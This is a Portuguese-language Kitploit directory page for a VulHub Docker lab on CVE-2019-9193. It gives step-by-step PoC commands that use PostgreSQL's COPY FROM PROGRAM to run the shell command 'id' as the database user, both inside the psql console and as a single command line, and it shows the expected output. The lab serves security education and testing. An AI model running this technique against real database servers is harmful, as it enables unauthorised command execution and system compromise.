Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2019-9193byVulHub — Laboratório baseado em Docker demonstrando a execução arbitrária de comandos no PostgreSQL via COPY FROM PROGRAM referente à CVE-2019-9193, com PoC passo a passo para testes de segurança e educação. | Kitploit
Ferramentas/GitHubGitHub/corsisechero/cve-2019-9193byvulhub
Análise de VulnerabilidadesExploraçãoTestes de PenetraçãoAprendizado e EducaçãoSegurança de Banco de DadosLabs e Prática
GitHubcorsisechero/cve-2019-9193byvulhub

CVE-2019-9193byVulHub

Laboratório baseado em Docker demonstrando a execução arbitrária de comandos no PostgreSQL via COPY FROM PROGRAM referente à CVE-2019-9193, com PoC passo a passo para testes de segurança e educação.

Ver Repositório
5há 1 anoAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2019-9193byVulHub


Execução Arbitrária de Comandos no PostgreSQL com Privilégios de Administrador (CVE-2019-9193)

Descrição

PostgreSQL é um poderoso sistema de gerenciamento de banco de dados relacional open-source. Uma vulnerabilidade presente nas versões 9.3 a 11 permite que administradores ou usuários com os privilégios COPY TO/FROM PROGRAM executem comandos arbitrários no sistema.

Referências:

  • GitHub - Vulhub - PostgreSQL CVE-2019-9193
  • Greenwolf Security - Authenticated Arbitrary Command Execution on PostgreSQL 9.3 - Latest

Configuração do ambiente

Arquivo Docker Compose ()

docker-compose.yml

Crie um arquivo docker-compose.yml com o seguinte conteúdo:

root@kitploit:~
version: '2'
services:
 postgres:
   image: vulhub/postgres:10.7
   ports:
    - "5432:5432"
   environment:
    - POSTGRES_PASSWORD=postgres

Inicialização do container PostgreSQL

Execute o container com o seguinte comando:

root@kitploit:~
docker compose up -d

Verifique se o container está em execução:

root@kitploit:~
docker ps

A saída deve mostrar o container PostgreSQL escutando na porta 5432.


Execução do exploit sem entrar no container

1. Instalação do cliente PostgreSQL

Se você não tiver o cliente psql instalado, pode instalá-lo com:

  • Kali:
    root@kitploit:~
    apt-get install postgresql-client
    

2. Conexão ao banco de dados pela linha de comando

Conecte-se ao banco de dados diretamente do Kali:

root@kitploit:~
psql -h localhost -p 5432 -U postgres

Será solicitada a senha, insira:

root@kitploit:~
postgres

3. Execução do PoC (Proof of Concept)

Após conectar-se ao console PostgreSQL, execute os seguintes comandos para explorar a vulnerabilidade:

root@kitploit:~
-- Elimina la tabella se esiste
DROP TABLE IF EXISTS cmd_exec;

-- Crea una nuova tabella per memorizzare l'output del comando
CREATE TABLE cmd_exec(cmd_output text);

-- Esegui il comando 'id' tramite la funzione COPY FROM PROGRAM
COPY cmd_exec FROM PROGRAM 'id';

-- Visualizza l'output del comando
SELECT * FROM cmd_exec;

4. Execução do comando pela linha de comando (sem shell interativo)

Você pode executar tudo diretamente pela linha de comando:

root@kitploit:~
psql -h localhost -p 5432 -U postgres -c "DROP TABLE IF EXISTS cmd_exec; CREATE TABLE cmd_exec(cmd_output text); COPY cmd_exec FROM PROGRAM 'id'; SELECT * FROM cmd_exec;"

Verificação da saída

Se o exploit for bem-sucedido, você deverá ver uma saída semelhante:

root@kitploit:~
       cmd_output
-------------------------
 uid=999(postgres) gid=999(postgres) groups=999(postgres)
(1 row)

Sair do console PostgreSQL

Pressione \q para sair:

root@kitploit:~
\q

Notas de segurança

Esta vulnerabilidade permite a execução arbitrária de comandos com privilégios administrativos. Utilize-a apenas em ambientes controlados e para fins de estudo ou verificação. Explorar esta vulnerabilidade em sistemas não autorizados é ilegal.

root@kitploit:~
Baixar ferramenta